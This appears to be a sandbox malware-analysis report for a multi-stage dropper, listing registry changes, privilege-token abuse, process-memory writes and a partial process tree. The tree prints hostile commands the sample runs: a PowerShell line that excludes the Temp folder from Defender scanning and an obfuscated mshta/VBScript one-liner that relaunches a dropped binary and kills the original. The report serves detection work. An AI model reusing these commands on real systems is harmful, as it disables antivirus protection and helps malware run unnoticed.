\REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 7 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 12584 taskkill.exe 5600 taskkill.exe 8052 taskkill.exe 8568 taskkill.exe 8780 taskkill.exe 8672 taskkill.exe 9260 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exesihclient.exesvchost.exemsiexec.exeUpSys.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ UpSys.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Modifies registry class 4 IoCs
Processes:
description ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ -
Processes:
installer.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeFri10d184202996a0d7f.exeFri10584c049c7f.exepid process 4564 powershell.exe 4564 powershell.exe 4356 Fri10d184202996a0d7f.exe 4356 Fri10d184202996a0d7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe 3204 Fri10584c049c7f.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
foldershare.exepid process 3208 5960 foldershare.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
uFV1qYteW8OniKJlNEeZ9vlH.exe134A.exepid process 5280 uFV1qYteW8OniKJlNEeZ9vlH.exe 3476 134A.exe -
Suspicious behavior: SetClipboardViewer 3 IoCs
Processes:
2118840.scr3308248.scr6063150.scrpid process 5992 2118840.scr 6996 3308248.scr 2516 6063150.scr -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Fri10720d229511df563.exeFri103a7805577.exeFri10b0a06a73706.exepowershell.exe8866579.scrtaskkill.exeWerFault.exeWerFault.execonhost.exeFri10d184202996a0d7f.execmd.exedescription pid process Token: SeCreateTokenPrivilege 4560 Fri10720d229511df563.exe Token: SeAssignPrimaryTokenPrivilege 4560 Fri10720d229511df563.exe Token: SeLockMemoryPrivilege 4560 Fri10720d229511df563.exe Token: SeIncreaseQuotaPrivilege 4560 Fri10720d229511df563.exe Token: SeMachineAccountPrivilege 4560 Fri10720d229511df563.exe Token: SeTcbPrivilege 4560 Fri10720d229511df563.exe Token: SeSecurityPrivilege 4560 Fri10720d229511df563.exe Token: SeTakeOwnershipPrivilege 4560 Fri10720d229511df563.exe Token: SeLoadDriverPrivilege 4560 Fri10720d229511df563.exe Token: SeSystemProfilePrivilege 4560 Fri10720d229511df563.exe Token: SeSystemtimePrivilege 4560 Fri10720d229511df563.exe Token: SeProfSingleProcessPrivilege 4560 Fri10720d229511df563.exe Token: SeIncBasePriorityPrivilege 4560 Fri10720d229511df563.exe Token: SeCreatePagefilePrivilege 4560 Fri10720d229511df563.exe Token: SeCreatePermanentPrivilege 4560 Fri10720d229511df563.exe Token: SeBackupPrivilege 4560 Fri10720d229511df563.exe Token: SeRestorePrivilege 4560 Fri10720d229511df563.exe Token: SeShutdownPrivilege 4560 Fri10720d229511df563.exe Token: SeDebugPrivilege 4560 Fri10720d229511df563.exe Token: SeAuditPrivilege 4560 Fri10720d229511df563.exe Token: SeSystemEnvironmentPrivilege 4560 Fri10720d229511df563.exe Token: SeChangeNotifyPrivilege 4560 Fri10720d229511df563.exe Token: SeRemoteShutdownPrivilege 4560 Fri10720d229511df563.exe Token: SeUndockPrivilege 4560 Fri10720d229511df563.exe Token: SeSyncAgentPrivilege 4560 Fri10720d229511df563.exe Token: SeEnableDelegationPrivilege 4560 Fri10720d229511df563.exe Token: SeManageVolumePrivilege 4560 Fri10720d229511df563.exe Token: SeImpersonatePrivilege 4560 Fri10720d229511df563.exe Token: SeCreateGlobalPrivilege 4560 Fri10720d229511df563.exe Token: 31 4560 Fri10720d229511df563.exe Token: 32 4560 Fri10720d229511df563.exe Token: 33 4560 Fri10720d229511df563.exe Token: 34 4560 Fri10720d229511df563.exe Token: 35 4560 Fri10720d229511df563.exe Token: SeDebugPrivilege 5004 Fri103a7805577.exe Token: SeDebugPrivilege 1200 Fri10b0a06a73706.exe Token: SeDebugPrivilege 4564 powershell.exe Token: SeDebugPrivilege 5776 8866579.scr Token: SeDebugPrivilege 5600 taskkill.exe Token: SeRestorePrivilege 5740 WerFault.exe Token: SeBackupPrivilege 5740 WerFault.exe Token: SeRestorePrivilege 912 WerFault.exe Token: SeBackupPrivilege 912 WerFault.exe Token: SeBackupPrivilege 912 WerFault.exe Token: SeDebugPrivilege 5744 conhost.exe Token: SeDebugPrivilege 4356 Fri10d184202996a0d7f.exe Token: SeDebugPrivilege 5768 cmd.exe Token: SeIncreaseQuotaPrivilege 4564 powershell.exe Token: SeSecurityPrivilege 4564 powershell.exe Token: SeTakeOwnershipPrivilege 4564 powershell.exe Token: SeLoadDriverPrivilege 4564 powershell.exe Token: SeSystemProfilePrivilege 4564 powershell.exe Token: SeSystemtimePrivilege 4564 powershell.exe Token: SeProfSingleProcessPrivilege 4564 powershell.exe Token: SeIncBasePriorityPrivilege 4564 powershell.exe Token: SeCreatePagefilePrivilege 4564 powershell.exe Token: SeBackupPrivilege 4564 powershell.exe Token: SeRestorePrivilege 4564 powershell.exe Token: SeShutdownPrivilege 4564 powershell.exe Token: SeDebugPrivilege 4564 powershell.exe Token: SeSystemEnvironmentPrivilege 4564 powershell.exe Token: SeRemoteShutdownPrivilege 4564 powershell.exe Token: SeUndockPrivilege 4564 powershell.exe Token: SeManageVolumePrivilege 4564 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
msedge.exeultramediaburner.tmpsetup_2.tmpinstaller.exepid process 2112 msedge.exe 7772 ultramediaburner.tmp 9172 setup_2.tmp 14532 installer.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
cmd.execmd.exepid process 3748 cmd.exe 1116 cmd.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3208 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3552 wrote to memory of 4776 3552 setup_x86_x64_install.exe setup_installer.exe PID 3552 wrote to memory of 4776 3552 setup_x86_x64_install.exe setup_installer.exe PID 3552 wrote to memory of 4776 3552 setup_x86_x64_install.exe setup_installer.exe PID 4776 wrote to memory of 4820 4776 setup_installer.exe setup_install.exe PID 4776 wrote to memory of 4820 4776 setup_installer.exe setup_install.exe PID 4776 wrote to memory of 4820 4776 setup_installer.exe setup_install.exe PID 4820 wrote to memory of 4132 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4132 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4132 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4112 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4112 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4112 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 3528 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 3528 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 3528 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 5044 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 5044 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 5044 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4544 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4544 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4544 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 2592 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 2592 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 2592 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4832 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4832 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4832 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 868 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 868 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 868 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 2380 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 2380 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 2380 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4500 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4500 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4500 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4512 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4512 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4512 4820 setup_install.exe cmd.exe PID 3528 wrote to memory of 3204 3528 cmd.exe Fri10584c049c7f.exe PID 3528 wrote to memory of 3204 3528 cmd.exe Fri10584c049c7f.exe PID 3528 wrote to memory of 3204 3528 cmd.exe Fri10584c049c7f.exe PID 4820 wrote to memory of 1112 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 1112 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 1112 4820 setup_install.exe cmd.exe PID 5044 wrote to memory of 1200 5044 cmd.exe Fri10b0a06a73706.exe PID 5044 wrote to memory of 1200 5044 cmd.exe Fri10b0a06a73706.exe PID 4544 wrote to memory of 1172 4544 cmd.exe Fri1015b9a4e0b.exe PID 4544 wrote to memory of 1172 4544 cmd.exe Fri1015b9a4e0b.exe PID 4544 wrote to memory of 1172 4544 cmd.exe Fri1015b9a4e0b.exe PID 2592 wrote to memory of 3872 2592 cmd.exe Fri106e757f6d75.exe PID 2592 wrote to memory of 3872 2592 cmd.exe Fri106e757f6d75.exe PID 2592 wrote to memory of 3872 2592 cmd.exe Fri106e757f6d75.exe PID 4820 wrote to memory of 4140 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4140 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4140 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4760 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4760 4820 setup_install.exe cmd.exe PID 4820 wrote to memory of 4760 4820 setup_install.exe cmd.exe PID 4832 wrote to memory of 4768 4832 cmd.exe Fri1008c7d6874.exe PID 4832 wrote to memory of 4768 4832 cmd.exe Fri1008c7d6874.exe PID 4832 wrote to memory of 4768 4832 cmd.exe Fri1008c7d6874.exe PID 868 wrote to memory of 5004 868 cmd.exe Fri103a7805577.exe PID 868 wrote to memory of 5004 868 cmd.exe Fri103a7805577.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1034cd265b5e0adcd.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1034cd265b5e0adcd.exeFri1034cd265b5e0adcd.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1034cd265b5e0adcd.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1034cd265b5e0adcd.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )6⤵
-
